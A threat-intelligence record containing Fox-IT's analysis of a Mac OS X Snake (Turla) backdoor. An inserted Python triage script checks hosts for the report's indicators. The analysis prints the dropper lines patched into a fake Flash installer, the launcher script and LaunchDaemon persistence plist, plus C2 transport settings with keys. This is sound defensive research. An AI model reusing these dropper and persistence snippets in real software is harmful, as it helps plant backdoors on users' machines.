{
	"id": "f4d228ec-2b12-4158-b24f-cddc8e9b5603",
	"created_at": "2026-04-06T00:12:18.234659Z",
	"updated_at": "2026-04-10T03:37:50.69935Z",
	"deleted_at": null,
	"sha1_hash": "0df9b24c7c8efb2f7fdb66ef7eb173bb7803aeac",
	"title": "Snake: Coming soon in Mac OS X flavour",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 100730,
	"plain_text": "Snake: Coming soon in Mac OS X flavour\r\nBy maartenvandantzigfoxit\r\nPublished: 2017-05-03 · Archived: 2026-04-05 20:09:02 UTC\r\nSummary\r\nSnake, also known as Turla, Uroburos and Agent.BTZ, is a relatively complex malware framework used for targeted attacks [1].\r\nOver the past year Fox-IT has been involved in multiple incident response cases in which the Snake framework was used to steal sensitive information. Targets include government institutions, military and large corporates.\r\nResearchers who have previously analysed compromises in which Snake was used have attributed the attacks to Russia [2]. Compared to other prolific attackers with alleged ties to Russia, such as APT28 (Fancy Bear) and APT29 (Cozy Bear), Snake’s code is significantly more sophisticated, its infrastructure more complex and its targets more carefully selected.\r\nThe framework has traditionally focused on the Windows operating system, but in 2014 the first Linux variant was observed [3].\r\nNow, Fox-IT has identified a version of Snake targeting Mac OS X.\r\nBecause this version still contains debug functionality and was only signed on February 21st, 2017, the OS X version of Snake is probably not yet operational.\r\nFox-IT expects that the attackers using Snake will soon use the Mac OS X variant against targets.\r\nFunctionality\r\nIn the Windows versions the architecture of Snake typically consists of a kernel-mode driver designed to hide the presence of several Snake components and to provide low-level access to network communication. Depending on the architecture of the targeted machine, either kernel or user mode is used for network communication.\r\nThe OS X version of Snake is a port of the Windows version.
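Before the installer, persistence and indicator sections that follow, here is an added triage script, written for this page rather than taken from Fox-IT or the original post, that checks a macOS filesystem root for the artefacts the report describes: the dropped files under /Library/Scripts and /tmp, the SHA256 hashes from the indicator list, and a LaunchDaemon plist with the traits of com.adobe.update.plist (a Label that does not match the file name, a ProgramArguments entry under /Library/Scripts, and KeepAlive set). Every path and hash in it comes from the report; the function names are chosen here, and build_sample_tree() is a constructed test tree, not data from an infected host.

```python
# Added triage helper for this page, not Fox-IT code: checks a macOS root for the files, hashes and LaunchDaemon plist in the report.
import glob
import hashlib
import os
import plistlib
import tempfile

IOC_PATHS = [  # file indicators from the report, relative to the filesystem root
    'Library/LaunchDaemons/com.adobe.update.plist',
    'Library/Scripts/installd.sh',
    'Library/Scripts/queue',
    'tmp/.gdm-socket',
    'tmp/.gdm-selinux',
]
IOC_GLOBS = ['var/tmp/.ur-*']

# SHA256 indicators from the report.
IOC_SHA256 = {
    'b8ee4556dc09b28826359b98343a4e00680971a6f8c6602747bd5d723d26eaea': 'Install Adobe Flash Player.app.zip',
    '5b7792a16c6b7978fca389882c6aeeb2c792352076bf6a064e7b8b90eace8060': 'Install',
    '0a77f1b59c829a83d91a12c871fbd30c5c9d04b455f497e0c231cd21104bfea9': 'install.sh',
    '7848f7808af02ba0466f3a0687cf949c4d29a2d94b035481a3299ec519aaaa30': 'Install Adobe Flash Player',
    'd5ea79632a1a67abbf9fb1c2813b899c90a5fb9442966ed4f530e92715087ee2': 'installdp',
    'b6df610aa5c1254c3af5b2ff806562c4937704e4ac248577cdcd3e7e7b3578a0': 'com.adobe.update',
    '6e207a375782e3c9d86a3e426cfa38eddcf4898b3556abc75889f7e01cc49506': 'installd.sh',
    '92721d719b8085748fb66366d202457f6d38bfa108a2ecda71eee7e68f43a387': 'queue',
}


def sha256_of(path):
    # Hex SHA256 of a file, read in 64 KiB chunks so large files stay off the heap.
    digest = hashlib.sha256()
    with open(path, 'rb') as fp:
        for chunk in iter(lambda: fp.read(1 << 16), b''):
            digest.update(chunk)
    return digest.hexdigest()


def check_launchdaemon(plist_path):
    # Returns the reasons a LaunchDaemon plist resembles com.adobe.update.plist.
    reasons = []
    try:
        with open(plist_path, 'rb') as fp:
            data = plistlib.load(fp)
    except Exception as exc:
        return ['unparseable plist: %s' % exc]
    stem = os.path.basename(plist_path)[:-len('.plist')]
    label = str(data.get('Label', ''))
    if label != stem:
        reasons.append('Label %s does not match file name %s' % (label, stem))
    args = data.get('ProgramArguments') or []
    if args and str(args[0]).startswith('/Library/Scripts/'):
        reasons.append('runs a script from /Library/Scripts: %s' % args[0])
    if data.get('KeepAlive'):
        reasons.append('KeepAlive is set, so launchd restarts the job when it exits')
    return reasons


def scan(root, hashes=IOC_SHA256):
    # Scan a filesystem root (/ or a mounted image) for the indicators above.
    report = {'paths': [], 'hashes': [], 'daemons': {}}
    for rel in IOC_PATHS:
        if os.path.lexists(os.path.join(root, rel)):
            report['paths'].append(rel)
    for pattern in IOC_GLOBS:
        report['paths'] += [os.path.relpath(p, root) for p in glob.glob(os.path.join(root, pattern))]
    for rel in ('Library/Scripts', 'Library/LaunchDaemons'):
        directory = os.path.join(root, rel)
        if not os.path.isdir(directory):
            continue
        for name in sorted(os.listdir(directory)):
            path = os.path.join(directory, name)
            if not os.path.isfile(path):
                continue
            digest = sha256_of(path)
            if digest in hashes:
                report['hashes'].append((os.path.relpath(path, root), hashes[digest]))
            if rel == 'Library/LaunchDaemons' and name.endswith('.plist'):
                reasons = check_launchdaemon(path)
                if reasons:
                    report['daemons'][os.path.relpath(path, root)] = reasons
    return report


def build_sample_tree():
    # Constructed fixture: a throwaway root laid out like an infected host.
    root = tempfile.mkdtemp(prefix='snake-triage-')
    daemons = os.path.join(root, 'Library', 'LaunchDaemons')
    scripts = os.path.join(root, 'Library', 'Scripts')
    for directory in (daemons, scripts, os.path.join(root, 'tmp')):
        os.makedirs(directory)
    job = {
        'Label': 'com.apple.update',
        'ProgramArguments': ['/Library/Scripts/installd.sh'],
        'KeepAlive': True,
    }
    with open(os.path.join(daemons, 'com.adobe.update.plist'), 'wb') as fp:
        plistlib.dump(job, fp)
    open(os.path.join(scripts, 'queue'), 'wb').close()  # empty stand-in for the real queue file
    open(os.path.join(root, 'tmp', '.gdm-socket'), 'wb').close()
    return root
```

Call scan('/') on a live system, or scan on the mount point of a disk image, and read the returned dict: the indicator paths that exist, the files whose SHA256 is in the list, and the plists that tripped the launchd heuristics. The hash list only matches this exact sample, so the plist heuristics and the file paths are the more durable signals.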
References to explorer, Internet Explorer and Named Pipes are still present in the binary, a leftover from the Windows code base.\r\nInstall Adobe Flash Player.app\r\nThe Snake binary comes inside a ZIP archive named Install Adobe Flash Player.app.zip, a backdoored version of Adobe’s Flash Player installer.\r\nThe install.sh script is patched with the following lines:\r\n#!/bin/sh\r\nSCRIPT_DIR=$(dirname \"$0\")\r\nTARGET_PATH=/Library/Scripts\r\nTARGET_PATH2=/Library/LaunchDaemons\r\ncp -f \"${SCRIPT_DIR}/queue\" \"${TARGET_PATH}/queue\"\r\ncp -f \"${SCRIPT_DIR}/installdp\" \"${TARGET_PATH}/installdp\"\r\ncp -f \"${SCRIPT_DIR}/installd.sh\" \"${TARGET_PATH}/installd.sh\"\r\ncp -f \"${SCRIPT_DIR}/com.adobe.update\" \"$TARGET_PATH2/com.adobe.update.plist\"\r\n\"${TARGET_PATH}/installd.sh\"\r\n\"${SCRIPT_DIR}/Install Adobe Flash Player\"\r\nexit $RC\r\nThe patched installer thus drops the queue file, the installdp binary and installd.sh into /Library/Scripts, registers com.adobe.update.plist as a LaunchDaemon, starts installd.sh and only then runs the bundled Install Adobe Flash Player executable, so the user sees an ordinary installation. Because /Library/LaunchDaemons is writable only by root, the dropper depends on the user running the installer with administrator privileges.\r\nThe installd.sh that is invoked contains the following code:\r\n#!/bin/bash\r\nSCRIPT_DIR=$(dirname \"$0\")\r\nFILE=\"${SCRIPT_DIR}/queue#1\"\r\nPIDS=`ps cax | grep installdp | grep -o '^[ ]*[0-9]*'`\r\nif [ -z \"$PIDS\" ]; then\r\n${SCRIPT_DIR}/installdp ${FILE} n\r\nfi\r\nThe script checks whether installdp is already running and, if not, starts it with:\r\n/Library/Scripts/installdp /Library/Scripts/queue#1 n\r\nThe trailing n selects the n[ormal] mode named in the usage string quoted under Debug build below.\r\nPersistence\r\nThe backdoor is persisted via Apple’s LaunchDaemon mechanism:\r\n$ plutil -p /Library/LaunchDaemons/com.adobe.update.plist\r\n{\r\n  \"ProgramArguments\" => [\r\n    0 => \"/Library/Scripts/installd.sh\"\r\n  ]\r\n  \"KeepAlive\" => 1\r\n  \"Label\" => \"com.apple.update\"\r\n  \"OnDemand\" => 1\r\n  \"POSIXSpawnType\" => \"Interactive\"\r\n}\r\nTwo details are worth noting: the Label (com.apple.update) does not match the file name (com.adobe.update.plist), and KeepAlive makes launchd restart installd.sh whenever it exits, while the script itself only starts installdp if it is not already running.\r\nCodesigning details\r\nBy default Gatekeeper only allows a downloaded application to run if it is signed with a valid Developer ID certificate issued by Apple (unless the user has configured it otherwise). The following, likely stolen, developer certificate was used to sign the fake Adobe Flash installer that carries the Snake binary:\r\nExecutable=Install Adobe Flash Player.app/Install\r\nIdentifier=com.addy.InstallAdobeFlash\r\nFormat=app bundle with Mach-O thin (x86_64)\r\nCodeDirectory v=20200 size=390 flags=0x0(none) hashes=12+3 location=embedded\r\nHash type=sha1 size=20\r\nCandidateCDHash sha1=ffc1a65f9153c94999212fb8bd7e3950eca035ae\r\nHash choices=sha1\r\nCDHash=ffc1a65f9153c94999212fb8bd7e3950eca035ae\r\nSignature size=4231\r\nAuthority=Developer ID Application: Addy Symonds (EHWBRW848H)\r\nAuthority=Developer ID Certification Authority\r\nAuthority=Apple Root CA\r\nSigned Time=21 Feb 2017 08:55:36\r\nInfo.plist entries=22\r\nTeamIdentifier=EHWBRW848H\r\nSealed Resources version=2 rules=12 files=86\r\nInternal requirements count=1 size=188\r\nFox-IT has informed Apple’s security team and requested that the certificate be revoked. The TeamIdentifier (EHWBRW848H) can also be used to hunt for other binaries signed with the same identity.\r\nDebug build\r\nSeveral strings found throughout the binary indicate that this version is in fact a debug build:\r\nfwrite (\"Usage: snake_test e[vent]|n[ormal]\\n\", 0x30uLL, 1uLL, *__stderrp_ptr);\r\nfprintf (v16, \"[%s:%s:%d] %s\\n\", \"../../../snake/snake_test.c\", \"main\", 86LL, err);\r\nAn interesting observation is that the contents of a temporary file storing command output are converted using the KOI8-R encoding, a codepage designed for the Russian language and its Cyrillic alphabet:\r\nascii2uni(koi8_str, unicode_str, -1LL, \"KOI8-R\");\r\nThis indicates that the developers tested with Russian command output (encoded in the KOI8-R codepage). On systems where command output is produced in another language (and another codepage), the text would be incorrectly rendered as Cyrillic characters.\r\nQueue file\r\nBuilds of Snake generally contain a queue file. Queue files store Snake’s configuration data, module binaries and queued network packets. Parsing the queue file of this sample with MM_snake_queuefile.py gives the following records:\r\n$ python MM_snake_queuefile.py queue\r\nOFFSET     STREAM   TYPE ID       SIZE     WRITTEN             DATA\r\n0x0000006c 00000001 0002 00000227 00000010 2017-02-10 12:23:22 '\\x98\\xa7w{\\xc7\\xcc4\\x03-\\xdcz\\x0b\\xc9,`\\x1c'\r\n0x000000bc 00000001 0002 00000228 00000010 2017-02-10 12:23:22 '\\x90*\\xa6\\xc5c\\x89H\\xe2>\\x9fS\\x1f\\xb2\\x0b\\xf8\\xb7'\r\n0x0000010c 00000001 0002 00000229 00000010 2017-02-10 12:23:22 '\\x95\\x9a\\xdf\\x82\\xf8l\\xbe.YR)\\xcc\\x1a{\\xac\\x8f'\r\n0x0000015c 00000001 0002 000000df 00000009 2017-02-10 12:23:22 '300000\\x00'\r\n0x000001a5 00000001 0002 000000e0 00000009 2017-02-10 12:23:22 '600000\\x00'\r\n0x000001ee 00000001 0002 00000190 00000009 2017-02-10 12:23:22 '20000\\x00'\r\n0x00000237 00000001 0002 000000e1 00000009 2017-02-10 12:23:22 '4096\\x00'\r\n0x00000280 00000001 0002 000000e2 00000009 2017-02-10 12:23:22 '65536\\x00'\r\n0x000002c9 00000001 0002 00000143 00000009 2017-02-10 12:23:22 '4096\\x00'\r\n0x00000312 00000001 0002 00000144 00000009 2017-02-10 12:23:22 '65536\\x00'\r\n0x0000035b 00000001 0002 00000001 00000009 2017-02-10 12:23:22 '1000\\x00'\r\n0x000003a4 fffffffd 0002 00000229 00000010 2017-02-10 12:23:22 '\\xfb\\xb20\\x87\\xb9m\\xa2\\x80!\\x80\\xcc\\x1aJbX'\r\n0x000003f4 00000001 0002 00000008 00000011 2017-02-10 12:23:22 '0xfd4488e9\\x00'\r\n0x00000445 00000001 0002 00000009 00000009 2017-02-10 12:23:22 '0\\x00'\r\n0x0000048e 00000001 0002 00000064 00000009 2017-02-10 12:23:22 '2\\x00'\r\n0x000004d7 00000001 0002 00000065 00000021 2017-02-10 12:23:22 'enc.unix//tmp/.gdm-socket\\x00'\r\n0x00000538 00000001 0002 00000066 00000031 2017-02-10 12:23:22 'enc.frag.reliable.doms.unix//tmp/.gdm-selinux\\x00'\r\n0x000005a9 00000001 0002 00000070 00000029 2017-02-10 12:23:22 'read_peer_nfo=Y,psk=!HqACg3ILQd-w7e4\\x00'\r\n0x00000612 00000001 0002 00000071 00000019 2017-02-10 12:23:22 'psk=R@gw1gBsRP!5!yj0\\x00'\r\n0x0000066b 00000001 0002 000000c8 00000009 2017-02-10 12:23:23 '1\\x00'\r\n0x000006b4 00000001 0002 000000c9 00000029 2017-02-10 12:23:23 'enc.http.tcp/car-service.effers.com:80\\x00'\r\n0x0000071d 00000001 0002 000000d4 00000029 2017-02-10 12:23:23 'psk=1BKQ55n6#OsIgwn*,ustart=bc41f8cd.0\\x00'\r\n0x00000786 00000001 0002 0000012c 00000009 2017-02-10 12:23:23 '1\\x00'\r\n0x000007cf 00000001 0002 0000012d 00000029 2017-02-10 12:23:23 'enc.http.tcp/car-service.effers.com:80\\x00'\r\n0x00000838 00000001 0002 00000138 00000029 2017-02-10 12:23:23 'psk=1BKQ55n6#OsIgwn*,ustart=bc41f8cd.0\\x00'\r\nThe following transport chains are configured in this queue file:\r\nenc.unix//tmp/.gdm-socket read_peer_nfo=Y,psk=!HqACg3ILQd-w7e4\r\nenc.frag.reliable.doms.unix//tmp/.gdm-selinux psk=R@gw1gBsRP!5!yj0\r\nenc.http.tcp/car-service.effers.com:80 psk=1BKQ55n6#OsIgwn*,ustart=bc41f8cd.0\r\nThe first two chains are local unix-socket transports (the socket paths reappear in the file indicators below); the third carries traffic over HTTP to car-service.effers.com on port 80. Each chain has its own pre-shared key (psk).\r\nObfuscated strings\r\nSnake binaries contain strings that are retrieved through the snake_name_get() call. Each string is stored as a pair of 0x40-byte blobs that are XOR-ed against each other. In this binary the blobs still contain placeholders that are yet to be replaced by the actual values, another indication that this Snake binary is not yet ready to be deployed to targets.\r\n00187e20 00 00 00 00 00 30 31 32 41 30 34 44 45 43 42 43 |.....012A04DECBC|\r\n00187e30 34 34 31 65 34 39 43 35 32 37 42 32 37 39 38 46 |441e49C527B2798F|\r\n00187e40 35 34 43 41 37 51 55 45 55 45 5f 50 41 54 48 5f |54CA7QUEUE_PATH_|\r\n00187e50 55 4e 49 58 00 00 00 00 00 00 00 00 00 00 00 00 |UNIX............|\r\n00187e60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|\r\n*\r\n00187ea0 00 00 00 00 00 30 31 32 41 30 34 44 45 43 42 43 |.....012A04DECBC|\r\n00187eb0 34 34 31 65 34 39 43 35 32 37 42 32 37 39 38 46 |441e49C527B2798F|\r\n00187ec0 35 34 43 41 37 4d 45 4a 49 52 4f 44 5f 50 41 54 |54CA7MEJIROD_PAT|\r\n00187ed0 48 5f 44 41 52 57 49 4e 00 00 00 00 00 00 00 00 |H_DARWIN........|\r\n00187ee0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|\r\nBoth blobs start with the same 32-character prefix (012A04DECBC441e49C527B2798F54CA7) followed by a placeholder name, QUEUE_PATH_UNIX and MEJIROD_PATH_DARWIN respectively.\r\nIndicators of compromise\r\nFiles\r\n/Library/LaunchDaemons/com.adobe.update.plist\r\n/Library/Scripts/installd.sh\r\n/Library/Scripts/queue\r\n/var/tmp/.ur-*\r\n/tmp/.gdm-socket\r\n/tmp/.gdm-selinux\r\nSHA256:\r\nb8ee4556dc09b28826359b98343a4e00680971a6f8c6602747bd5d723d26eaea Install Adobe Flash Player.app.zip\r\n5b7792a16c6b7978fca389882c6aeeb2c792352076bf6a064e7b8b90eace8060 Install\r\n0a77f1b59c829a83d91a12c871fbd30c5c9d04b455f497e0c231cd21104bfea9 install.sh\r\n7848f7808af02ba0466f3a0687cf949c4d29a2d94b035481a3299ec519aaaa30 Install Adobe Flash Player\r\nd5ea79632a1a67abbf9fb1c2813b899c90a5fb9442966ed4f530e92715087ee2 Installdp\r\nb6df610aa5c1254c3af5b2ff806562c4937704e4ac248577cdcd3e7e7b3578a0 com.adobe.update\r\n6e207a375782e3c9d86a3e426cfa38eddcf4898b3556abc75889f7e01cc49506 installd.sh\r\n92721d719b8085748fb66366d202457f6d38bfa108a2ecda71eee7e68f43a387 queue\r\nNetwork\r\nThe following domain is configured in Snake’s queue file for HTTP network transport:\r\ncar-service.effers.com (port 80)\r\nThe IP address the domain resolved to belongs to a satellite communications provider.\r\nThough Snake is typically spread using spear-phishing e-mails and watering-hole attacks, Fox-IT has not yet observed this sample being spread in the wild.\r\nJelle Vergeer, Krijn de Mik, Mitchel Sahertian, Maarten van Dantzig & Yun Zheng Hu\r\nFox-IT Threat Intelligence\r\nReferences\r\nPublished May 3, 2017, last updated May 7, 2017\r\nSource: https://blog.fox-it.com/2017/05/03/snake-coming-soon-in-mac-os-x-flavour/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"references": [
		"https://blog.fox-it.com/2017/05/03/snake-coming-soon-in-mac-os-x-flavour/"
	],
	"report_names": [
		"snake-coming-soon-in-mac-os-x-flavour"
	],
	"threat_actors": [
		{
			"id": "8aaa5515-92dd-448d-bb20-3a253f4f8854",
			"created_at": "2024-06-19T02:03:08.147099Z",
			"updated_at": "2026-04-10T02:00:03.685355Z",
			"deleted_at": null,
			"main_name": "IRON HUNTER",
			"aliases": [
				"ATK13 ",
				"Belugasturgeon ",
				"Blue Python ",
				"CTG-8875 ",
				"ITG12 ",
				"KRYPTON ",
				"MAKERSMARK ",
				"Pensive Ursa ",
				"Secret Blizzard ",
				"Turla",
				"UAC-0003 ",
				"UAC-0024 ",
				"UNC4210 ",
				"Venomous Bear ",
				"Waterbug "
			],
			"source_name": "Secureworks:IRON HUNTER",
			"tools": [
				"Carbon-DLL",
				"ComRAT",
				"LightNeuron",
				"Mosquito",
				"PyFlash",
				"Skipper",
				"Snake",
				"Tavdig"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "5b748f86-ac32-4715-be9f-6cf25ae48a4e",
			"created_at": "2024-06-04T02:03:07.956135Z",
			"updated_at": "2026-04-10T02:00:03.689959Z",
			"deleted_at": null,
			"main_name": "IRON HEMLOCK",
			"aliases": [
				"APT29 ",
				"ATK7 ",
				"Blue Kitsune ",
				"Cozy Bear ",
				"The Dukes",
				"UNC2452 ",
				"YTTRIUM "
			],
			"source_name": "Secureworks:IRON HEMLOCK",
			"tools": [
				"CosmicDuke",
				"CozyCar",
				"CozyDuke",
				"DiefenDuke",
				"FatDuke",
				"HAMMERTOSS",
				"LiteDuke",
				"MiniDuke",
				"OnionDuke",
				"PolyglotDuke",
				"RegDuke",
				"RegDuke Loader",
				"SeaDuke",
				"Sliver"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "a241a1ca-2bc9-450b-a07b-aae747ee2710",
			"created_at": "2024-06-19T02:03:08.150052Z",
			"updated_at": "2026-04-10T02:00:03.737173Z",
			"deleted_at": null,
			"main_name": "IRON RITUAL",
			"aliases": [
				"APT29",
				"Blue Dev 5 ",
				"BlueBravo ",
				"Cloaked Ursa ",
				"CozyLarch ",
				"Dark Halo ",
				"Midnight Blizzard ",
				"NOBELIUM ",
				"StellarParticle ",
				"UNC2452 "
			],
			"source_name": "Secureworks:IRON RITUAL",
			"tools": [
				"Brute Ratel C4",
				"Cobalt Strike",
				"EnvyScout",
				"GoldFinder",
				"GoldMax",
				"NativeZone",
				"RAINDROP",
				"SUNBURST",
				"Sibot",
				"TEARDROP",
				"VaporRage"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "a97cf06d-c2e2-4771-99a2-c9dee0d6a0ac",
			"created_at": "2022-10-25T16:07:24.349252Z",
			"updated_at": "2026-04-10T02:00:04.949821Z",
			"deleted_at": null,
			"main_name": "Turla",
			"aliases": [
				"ATK 13",
				"Belugasturgeon",
				"Blue Python",
				"CTG-8875",
				"G0010",
				"Group 88",
				"ITG12",
				"Iron Hunter",
				"Krypton",
				"Makersmark",
				"Operation Epic Turla",
				"Operation Moonlight Maze",
				"Operation Penguin Turla",
				"Operation Satellite Turla",
				"Operation Skipper Turla",
				"Operation Turla Mosquito",
				"Operation WITCHCOVEN",
				"Pacifier APT",
				"Pensive Ursa",
				"Popeye",
				"SIG15",
				"SIG2",
				"SIG23",
				"Secret Blizzard",
				"TAG-0530",
				"Turla",
				"UNC4210",
				"Venomous Bear",
				"Waterbug"
			],
			"source_name": "ETDA:Turla",
			"tools": [
				"ASPXSpy",
				"ASPXTool",
				"ATI-Agent",
				"AdobeARM",
				"Agent.BTZ",
				"Agent.DNE",
				"ApolloShadow",
				"BigBoss",
				"COMpfun",
				"Chinch",
				"Cloud Duke",
				"CloudDuke",
				"CloudLook",
				"Cobra Carbon System",
				"ComRAT",
				"DoublePulsar",
				"EmPyre",
				"EmpireProject",
				"Epic Turla",
				"EternalBlue",
				"EternalRomance",
				"GoldenSky",
				"Group Policy Results Tool",
				"HTML5 Encoding",
				"HyperStack",
				"IcedCoffee",
				"IronNetInjector",
				"KSL0T",
				"Kapushka",
				"Kazuar",
				"KopiLuwak",
				"Kotel",
				"LOLBAS",
				"LOLBins",
				"LightNeuron",
				"Living off the Land",
				"Maintools.js",
				"Metasploit",
				"Meterpreter",
				"MiamiBeach",
				"Mimikatz",
				"MiniDionis",
				"Minit",
				"NBTscan",
				"NETTRANS",
				"NETVulture",
				"Neptun",
				"NetFlash",
				"NewPass",
				"Outlook Backdoor",
				"Penquin Turla",
				"Pfinet",
				"PowerShell Empire",
				"PowerShellRunner",
				"PowerShellRunner-based RPC backdoor",
				"PowerStallion",
				"PsExec",
				"PyFlash",
				"QUIETCANARY",
				"Reductor RAT",
				"RocketMan",
				"SMBTouch",
				"SScan",
				"Satellite Turla",
				"SilentMoon",
				"Sun rootkit",
				"TTNG",
				"TadjMakhal",
				"Tavdig",
				"TinyTurla",
				"TinyTurla Next Generation",
				"TinyTurla-NG",
				"Topinambour",
				"Tunnus",
				"Turla",
				"Turla SilentMoon",
				"TurlaChopper",
				"Uroburos",
				"Urouros",
				"WCE",
				"WITCHCOVEN",
				"WhiteAtlas",
				"WhiteBear",
				"Windows Credential Editor",
				"Windows Credentials Editor",
				"Wipbot",
				"WorldCupSec",
				"XTRANS",
				"certutil",
				"certutil.exe",
				"gpresult",
				"nbtscan",
				"nbtstat",
				"pwdump"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "46b3c0fc-fa0c-4d63-a38a-b33a524561fb",
			"created_at": "2023-01-06T13:46:38.393409Z",
			"updated_at": "2026-04-10T02:00:02.955738Z",
			"deleted_at": null,
			"main_name": "APT29",
			"aliases": [
				"Cloaked Ursa",
				"TA421",
				"Blue Kitsune",
				"BlueBravo",
				"IRON HEMLOCK",
				"G0016",
				"Nobelium",
				"Group 100",
				"YTTRIUM",
				"Grizzly Steppe",
				"ATK7",
				"ITG11",
				"COZY BEAR",
				"The Dukes",
				"Minidionis",
				"UAC-0029",
				"SeaDuke"
			],
			"source_name": "MISPGALAXY:APT29",
			"tools": [
				"SNOWYAMBER",
				"HALFRIG",
				"QUARTERRIG"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "a97fee0d-af4b-4661-ae17-858925438fc4",
			"created_at": "2023-01-06T13:46:38.396415Z",
			"updated_at": "2026-04-10T02:00:02.957137Z",
			"deleted_at": null,
			"main_name": "Turla",
			"aliases": [
				"TAG_0530",
				"Pacifier APT",
				"Blue Python",
				"UNC4210",
				"UAC-0003",
				"VENOMOUS Bear",
				"Waterbug",
				"Pfinet",
				"KRYPTON",
				"Popeye",
				"SIG23",
				"ATK13",
				"ITG12",
				"Group 88",
				"Uroburos",
				"Hippo Team",
				"IRON HUNTER",
				"MAKERSMARK",
				"Secret Blizzard",
				"UAC-0144",
				"UAC-0024",
				"G0010"
			],
			"source_name": "MISPGALAXY:Turla",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "d11c89bb-1640-45fa-8322-6f4e4053d7f3",
			"created_at": "2022-10-25T15:50:23.509601Z",
			"updated_at": "2026-04-10T02:00:05.277674Z",
			"deleted_at": null,
			"main_name": "Turla",
			"aliases": [
				"Turla",
				"IRON HUNTER",
				"Group 88",
				"Waterbug",
				"WhiteBear",
				"Krypton",
				"Venomous Bear",
				"Secret Blizzard",
				"BELUGASTURGEON"
			],
			"source_name": "MITRE:Turla",
			"tools": [
				"PsExec",
				"nbtstat",
				"ComRAT",
				"netstat",
				"certutil",
				"KOPILUWAK",
				"IronNetInjector",
				"LunarWeb",
				"Arp",
				"Uroburos",
				"PowerStallion",
				"Kazuar",
				"Systeminfo",
				"LightNeuron",
				"Mimikatz",
				"Tasklist",
				"LunarMail",
				"HyperStack",
				"NBTscan",
				"TinyTurla",
				"Penquin",
				"LunarLoader"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "730dfa6e-572d-473c-9267-ea1597d1a42b",
			"created_at": "2023-01-06T13:46:38.389985Z",
			"updated_at": "2026-04-10T02:00:02.954105Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"Pawn Storm",
				"ATK5",
				"Fighting Ursa",
				"Blue Athena",
				"TA422",
				"T-APT-12",
				"APT-C-20",
				"UAC-0001",
				"IRON TWILIGHT",
				"SIG40",
				"UAC-0028",
				"Sofacy",
				"BlueDelta",
				"Fancy Bear",
				"GruesomeLarch",
				"Group 74",
				"ITG05",
				"FROZENLAKE",
				"Forest Blizzard",
				"FANCY BEAR",
				"Sednit",
				"SNAKEMACKEREL",
				"Tsar Team",
				"TG-4127",
				"STRONTIUM",
				"Grizzly Steppe",
				"G0007"
			],
			"source_name": "MISPGALAXY:APT28",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e3767160-695d-4360-8b2e-d5274db3f7cd",
			"created_at": "2022-10-25T16:47:55.914348Z",
			"updated_at": "2026-04-10T02:00:03.610018Z",
			"deleted_at": null,
			"main_name": "IRON TWILIGHT",
			"aliases": [
				"APT28 ",
				"ATK5 ",
				"Blue Athena ",
				"BlueDelta ",
				"FROZENLAKE ",
				"Fancy Bear ",
				"Fighting Ursa ",
				"Forest Blizzard ",
				"GRAPHITE ",
				"Group 74 ",
				"PawnStorm ",
				"STRONTIUM ",
				"Sednit ",
				"Snakemackerel ",
				"Sofacy ",
				"TA422 ",
				"TG-4127 ",
				"Tsar Team ",
				"UAC-0001 "
			],
			"source_name": "Secureworks:IRON TWILIGHT",
			"tools": [
				"Downdelph",
				"EVILTOSS",
				"SEDUPLOADER",
				"SHARPFRONT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "ae320ed7-9a63-42ed-944b-44ada7313495",
			"created_at": "2022-10-25T15:50:23.671663Z",
			"updated_at": "2026-04-10T02:00:05.283292Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"APT28",
				"IRON TWILIGHT",
				"SNAKEMACKEREL",
				"Group 74",
				"Sednit",
				"Sofacy",
				"Pawn Storm",
				"Fancy Bear",
				"STRONTIUM",
				"Tsar Team",
				"Threat Group-4127",
				"TG-4127",
				"Forest Blizzard",
				"FROZENLAKE",
				"GruesomeLarch"
			],
			"source_name": "MITRE:APT28",
			"tools": [
				"Wevtutil",
				"certutil",
				"Forfiles",
				"DealersChoice",
				"Mimikatz",
				"ADVSTORESHELL",
				"Komplex",
				"HIDEDRV",
				"JHUHUGIT",
				"Koadic",
				"Winexe",
				"cipher.exe",
				"XTunnel",
				"Drovorub",
				"CORESHELL",
				"OLDBAIT",
				"Downdelph",
				"XAgentOSX",
				"USBStealer",
				"Zebrocy",
				"reGeorg",
				"Fysbis",
				"LoJax"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "20d3a08a-3b97-4b2f-90b8-92a89089a57a",
			"created_at": "2022-10-25T15:50:23.548494Z",
			"updated_at": "2026-04-10T02:00:05.292748Z",
			"deleted_at": null,
			"main_name": "APT29",
			"aliases": [
				"APT29",
				"IRON RITUAL",
				"IRON HEMLOCK",
				"NobleBaron",
				"Dark Halo",
				"NOBELIUM",
				"UNC2452",
				"YTTRIUM",
				"The Dukes",
				"Cozy Bear",
				"CozyDuke",
				"SolarStorm",
				"Blue Kitsune",
				"UNC3524",
				"Midnight Blizzard"
			],
			"source_name": "MITRE:APT29",
			"tools": [
				"PinchDuke",
				"ROADTools",
				"WellMail",
				"CozyCar",
				"Mimikatz",
				"Tasklist",
				"OnionDuke",
				"FatDuke",
				"POSHSPY",
				"EnvyScout",
				"SoreFang",
				"GeminiDuke",
				"reGeorg",
				"GoldMax",
				"FoggyWeb",
				"SDelete",
				"PolyglotDuke",
				"AADInternals",
				"MiniDuke",
				"SeaDuke",
				"Sibot",
				"RegDuke",
				"CloudDuke",
				"GoldFinder",
				"AdFind",
				"PsExec",
				"NativeZone",
				"Systeminfo",
				"ipconfig",
				"Impacket",
				"Cobalt Strike",
				"PowerDuke",
